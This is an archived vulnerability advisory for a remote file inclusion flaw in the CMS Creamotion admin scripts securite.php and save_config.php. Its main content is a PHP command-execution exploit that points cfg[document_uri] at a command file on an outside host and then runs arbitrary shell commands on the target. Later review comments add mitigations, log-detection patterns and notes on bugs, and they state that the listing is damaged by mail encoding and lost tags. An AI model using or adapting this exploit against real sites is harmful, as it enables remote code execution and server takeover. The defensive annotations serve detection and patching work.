


CMS Creamotion - Remote File inclusion






Hello,

CMS Creamotion - Remote File Inclusion

Discovered By : HACKERS PAL
Copyright : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net

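Remote File Inclusion :

/_administration/securite.php?cfg[document_uri]=[Shell_DIR]

/_administration/gestion_configurations/save_config.php?cfg[document_uri]=[Shell_DIR]

Both scripts take the request parameter cfg[document_uri] and, judging by the exploit below, use it in a PHP include without validation, so a remote URL placed there is fetched and run on the server. The advisory names no affected version and no vendor fix. Until the code is patched, restrict access to /_administration/, keep allow_url_include off, and review web logs for requests to these two scripts in which cfg[document_uri] holds an absolute URL. (Overriding cfg[] from the query string presumably also depends on register_globals being enabled.)

Exploit :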
#!/usr/bin/php -q -d short_open_tag=on=0D
WwW.SoQoR.NeT=0D 
*/=0D
// NOTE(review): this listing is an archived mail copy. Every line carries a
// quoted-printable "=0D" residue, and the opening PHP tag and comment opener
// that the stray comment terminator above belonged to appear to have been
// lost in extraction, so the text does not parse as PHP as shown.
//
// Prints the author banner, then a usage message and exits when fewer than
// two command-line arguments (host, command) are supplied.
print_r('=0D
/**********************************************/=0D
/*     CMS Creamotion Command Execution       */=0D
/* by HACKERS PAL  */=0D 
/* site: http://www.soqor.net */');=0D 
if ($argc<3) {=0D
print_r('=0D
/* --                                         */=0D
/* Usage: php '.$argv[0].' host=0D
/* Example:                                   */=0D
/* php '.$argv[0].' http://localhost/ id=0D 
/**********************************************/=0D
');=0D
die;=0D
}=0D
// Silences all PHP error output and lifts the execution time limit for the run.
error_reporting(0);=0D
ini_set("max_execution_time",0);=0D
=0D
// Positional arguments: base URL of the target site and the command string.
$url=$argv[1];=0D
$cmd=$argv[2];=0D
// Request path for the first script named in the advisory, with
// cfg[document_uri] set to a text file hosted on a third-party server.
// The trailing "?" presumably turns whatever the application appends to the
// value into a query string - TODO confirm against the vulnerable include.
// Detection: an access-log entry for /_administration/securite.php (or
// /_administration/gestion_configurations/save_config.php) whose
// cfg[document_uri] value is an absolute URL matches this request shape.
$exploit="/_administration/securite.php?cfg[document_uri]=http://members.lycos.co.uk/soqor10/cmd.txt?";=0D 
// Full request URL = base URL followed by the path above.
$page=$url.$exploit;=0D
=0D
         /**
          * Fetch the content behind $url and return it as a string.
          *
          * Uses file_get_contents() when that function exists; otherwise opens
          * the URL with fopen() and reads it in 1024-byte chunks.
          *
          * NOTE(review): neither branch checks for failure. In the fallback
          * branch $contents is concatenated to before it is initialised, the
          * result of fopen() is not tested, and the handle is never closed.
          * With error_reporting(0) set earlier in the script, a failed fetch
          * produces no visible error.
          *
          * @param string $url URL to request.
          * @return string|false|null Response body; false or null when the
          *                           fetch fails or returns nothing.
          */
         Function get_page($url)=0D
         {=0D
=0D
                  if(function_exists("file_get_contents"))=0D
                  {=0D
=0D
                       $contents = file_get_contents($url);=0D
                          }=0D
                          else=0D
                          {=0D
                              // Fallback path: stream the response in 1024-byte reads.
                              $fp=fopen("$url","r");=0D
                              while($line=fread($fp,1024))=0D
                              {=0D
                               $contents=$contents.$line;=0D
                              }=0D
=0D
=0D
                                  }=0D
                       return $contents;=0D
         }=0D
     // First request: fetch the crafted URL without a cmd parameter.
     $npage    = get_page($page);=0D
=0D
=0D
     // The marker text is presumably what the remotely hosted file prints when
     // it runs without a command, so finding it in the response indicates the
     // target fetched and executed the remote file - TODO confirm, the remote
     // file itself is not part of this listing.
     if(eregi("Cannot execute a blank command",$npage))=0D
     {=0D
             // Second request: same URL with "&cmd=" and the second argument
             // appended; the response is printed as the result.
             // Detection: two consecutive requests to the same script from one
             // client, the second adding a cmd parameter, match this sequence.
             $pagecmd=$page."&cmd=$cmd";=0D
Die("\n[+] Exploit Is Working\n[+] Result For CMD : ".get_page($pagecmd)."\n[+] See The Vulnerabiliy article for more informations\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");=0D 
             }=0D
             Else=0D
             {=0D
// Marker not found: the script reports failure and exits.
Die("\n[-] Exploit Failed\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");=0D 
                }=0D
#WwW.SoQoR.NeT=0D 
?>=0D
=0D
WwW.SoQoR.NeT 

